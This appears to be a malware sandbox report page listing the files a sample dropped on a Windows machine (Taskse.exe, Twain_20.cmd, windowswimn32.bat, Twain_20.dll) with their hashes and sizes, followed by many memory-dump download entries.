
MD5
0c998e3681eb9f67fbacda38281c5fa7

SHA1
bd3e89780f374c54c5dfbe3fab83a926ca5803de

SHA256
3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205

SHA512
11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
5KB

MD5
8f6ece75d7cc39a8fcc3cd6e043a3ad4

SHA1
dd563d4d1db71d4f7a4b05b5c976aca467c6f628

SHA256
041de6639ababd997b3d559cf4c478e1a188204f898daa592808bf6db2836d70

SHA512
a610c6fdd55afebb7c33123b796620d812f89e8ef6c9bdb74472129c8414c3cf41220a0ebc282798a39f6429f3ac2b2b77bc78099559fe8fcd4e04f199b2c956

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
10KB

MD5
5e0a9956371cf103912ce2e3f4ad4067

SHA1
fc4d5ffab07aa849f9a6166c5318c879b9753af4

SHA256
65bdb3d52f1e73ebd2000b63909041d16394a3ad8748109d8115aa43d7e1b32f

SHA512
30247b02a7d8c80c4ed12480fe94288b4ace490190b9dcc0f52e844a2bcb047654f55a992e9152c93c18fe2e4ccaf3491c6f763b7962a93d9c2ec2305704b429

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
13KB

MD5
d6ad0d9be5389d0ce33f9dccf30d33b0

SHA1
19302a13e804ec8493059b227f33d6f1120fc657

SHA256
48171827347cc5b9852685e7d7f4e19932e68064bbed49ff8be6e02777c76032

SHA512
0750002eb1a047568e66c89aa4214b5d173d7876300ade297d5a8877d77d35a8d8cc2e2bd178099b3f4b7da564a1e3f11a2e18661df29e8bba824bfc5fc3864b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
18KB

MD5
c6c736d8f9b56b476578ae6e25996250

SHA1
468ad63bb359bfa9ee4e5d2175a05e3440f3d696

SHA256
b1ebd6e0046bc663af64e2268562da1275109f29a073213f8e4169b2f4674db5

SHA512
16d0b8ca24f885c6587ccb20f8c9598271bc9b251c3d2dd8deb873070818866ede8d38e87456664040e9746be2b2c85ac97e2c01b65ae98842963cdd591a56c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
4KB

MD5
25aaade1963c6c69bb0d63c947c95b34

SHA1
ee3a6d7e9e3479ed469ca16345f1acc9d3474d94

SHA256
d68279243a80856b26196f11a9202b2940714fc4aa0b963d51daaa6c51aeaa60

SHA512
30c549598484bb7db4af850e4b2e7b9ab2734f18a69ba45c35d262aa33fa55529adf9b448f2ce4279e7342ea0b78d8fd01844eb665541f755271b57bbb3e5651

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
394B

MD5
860e30812b58e6c1232adf06bd90b103

SHA1
f890c3657fa6b6e27b5dc7334291c3c525483d43

SHA256
18943050583976fd7746bb896bf2101c2cbfdecf9e40eb9c2a45892e442797e3

SHA512
81602b4fa3107da0d35b5a2259dfb1724771a94b3b3510a6f0e32f701d51a2712f7eaa8fe296c99d411401298e90ee19dcf3c872afda6cb626edcfa63f6db391

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
591B

MD5
63d77ff049ee69c5f08e8958bfacc702

SHA1
bb610a43e7032b070ee68d1c5872f9cf0b152ed0

SHA256
80ad9a66a1fa96e99cf676ae4c4cfb6eac98c753671eee86aa0e11796b69c1b2

SHA512
b20f366905676b255c0003b17b7ac7f3bfca93e39f4b6a08c8f3517007ac7ec2f30b3f2c8d6b3c169084c64e461b258f50372d22f0ace9aaa79dd13f9c6b7ca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
405B

MD5
246cde25337c679b596c2d53e727818b

SHA1
be8c4e14d3c97c7eeaedf66d70d4fd040d4c5169

SHA256
b00d0e7967b0afb88dd393e6bfa547376ca839e2a4480fe01fec1cc89fe19517

SHA512
2cc4e09f46009ccc9cfe5e61e81f96aa94162f142585c235084c1b097fbac9868a34e1e1f1dac376d75434fc09d5e52e084265b16eccd841a4be942c12e93c9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
355B

MD5
474c84d8ecdc147ccd23378f690bc86d

SHA1
d9e0fd0eaba5ce5e8f0d95b3e433e72007fcb633

SHA256
ce44ab8822f9a82c4d4df5ef51af080f5bebd443bb7f777e9d9a649642d57ea1

SHA512
96f3866c6453dd411f3c36dbf31aa3767afe1d33105d309b87ddbfcf6dbfecf45e34986559ca95e239334ccad5b86c3a0b0bbc695b63d7279bd281ae8721c038

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
552B

MD5
0ff367486d1527280623efdee188eea3

SHA1
3d504c20093d951ac56fb41c7e1203ed738637ac

SHA256
22b2df5c5d3a0492d851bdaedbbc15320cae2584e26b65d73ed2b122aad7d1cf

SHA512
f0823c414205893b4d5356666cca5468372a7f93d71f3da17f024c111a98f2adda5064ded2a6938682e2c2104a5d71ada4e43ffac8df7a420c5044afacbf2ded

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
158B

MD5
ad0010095a82da61b486dbe70cd90767

SHA1
67d5a65f8cee8409dfcec2da99d290a2730cd662

SHA256
28d651bd0e01d8ee66b46b064b05841cf33e44f3c55ee8b0612f5a812bf0de43

SHA512
93a5f5c2f71a00ce760f1efe89280e259b3f75f1d04e3a1708d683c0b9a619fb5ac577e0d9f59c3b767c3b45323e3af9450362624526705766bf77a94b4aa827

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
197B

MD5
c7f2bc79dba9b078638f4692947066b0

SHA1
a42bea02d22367788cb2dc77f68ea754c244a50c

SHA256
7be75820d337a48c320e260fb71f40a5a0cbfa5c8c225bec5ff23c1cc15566f7

SHA512
33f2a1c3708d4b3b353122105931ddb34dc4be146ffa73b24dee1eaaeb60f0eed2c3bbf4ad84d648f6408c8b9e0cbbbc421864514c1e057b0cea2c12b2c5d296

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat

Filesize
22B

MD5
fe669e0a3a56961fba38ef9b7f7d01dd

SHA1
338b6f4a3ec71587d53aec450ca5448928f966a1

SHA256
138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64

SHA512
ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat

Filesize
60B

MD5
8e0ea4d792fb47d3b10b1a3934b83ccb

SHA1
6c661e4593c46ca6dc53a90c1ce7eb52e9da11a0

SHA256
a19bea960eb554899b681e3cebd580a89e9eb1f91eed4e862a6b1caf13d181a4

SHA512
0bad852eef1abb4a9a1bf0b7e2e7f66aea9f1f0da1a46a53ee8e91d1c222d23dc039a3eaec7f7f719b727e03b6aed9e1f0f3c17f1b0d0ad4d753c23a0a756745

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat

Filesize
49B

MD5
cfb046d3c9513b92c1b287da26f97c28

SHA1
ea8208c4dad826b7fdb3b5b728863a95e86d4383

SHA256
a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b

SHA512
dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340

Download Submit
C:\Windows\System32\Twain_20.dll

Filesize
106KB

MD5
8b6a377f9a67d5482a8eba5708f45bb2

SHA1
7197436525e568606850ee5e033c43aea1c3bc91

SHA256
6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

SHA512
644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72

Download Submit
memory/948-5114-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/948-2826-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/1356-3345-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/1356-2477-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/1516-3203-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/1516-2476-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2032-406-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2032-2461-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2204-2463-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2204-414-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2748-2462-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2748-410-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2796-3397-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/2796-2478-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3144-2465-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3144-1454-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3420-2479-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3420-3468-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3856-2468-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3856-1737-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3916-2466-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3916-1475-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3952-3068-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3952-2473-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3956-1447-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/3956-2464-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4156-2470-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4156-1738-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4396-2474-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4396-3117-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4480-3572-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4676-2475-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/4676-3163-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5108-1733-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5108-2467-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5564-3198-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5852-2493-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5852-4441-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/5964-3346-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6204-3026-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6204-2472-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6212-3023-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6212-2471-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6680-3204-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6880-5405-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/6880-2915-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7140-2914-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7140-2469-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7192-3537-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7192-2480-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7292-3571-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7292-2481-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7436-4811-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7628-3697-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7628-2482-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7736-2486-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7736-3902-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7820-2483-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/7820-3799-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8048-3862-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8048-2484-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8184-2485-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8184-3890-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8224-2487-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8224-3955-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8300-2492-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8300-4436-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8556-2488-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8556-4194-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8720-4219-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8720-2489-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8860-2490-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/8860-4278-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9044-4431-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9044-2491-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9308-3509-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9632-3430-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9676-5182-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9676-2908-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/9968-4200-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10032-5032-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10032-2803-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10064-3027-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10064-5541-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10200-3119-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10200-5640-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10344-4227-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/10704-4437-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/11040-4036-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/11136-4794-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/11488-4692-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/12032-4563-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/12688-4879-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/12968-5033-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/13044-5115-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download
memory/13256-5183-0x000007FEF65D0000-0x000007FEF661C000-memory.dmp

Filesize
304KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.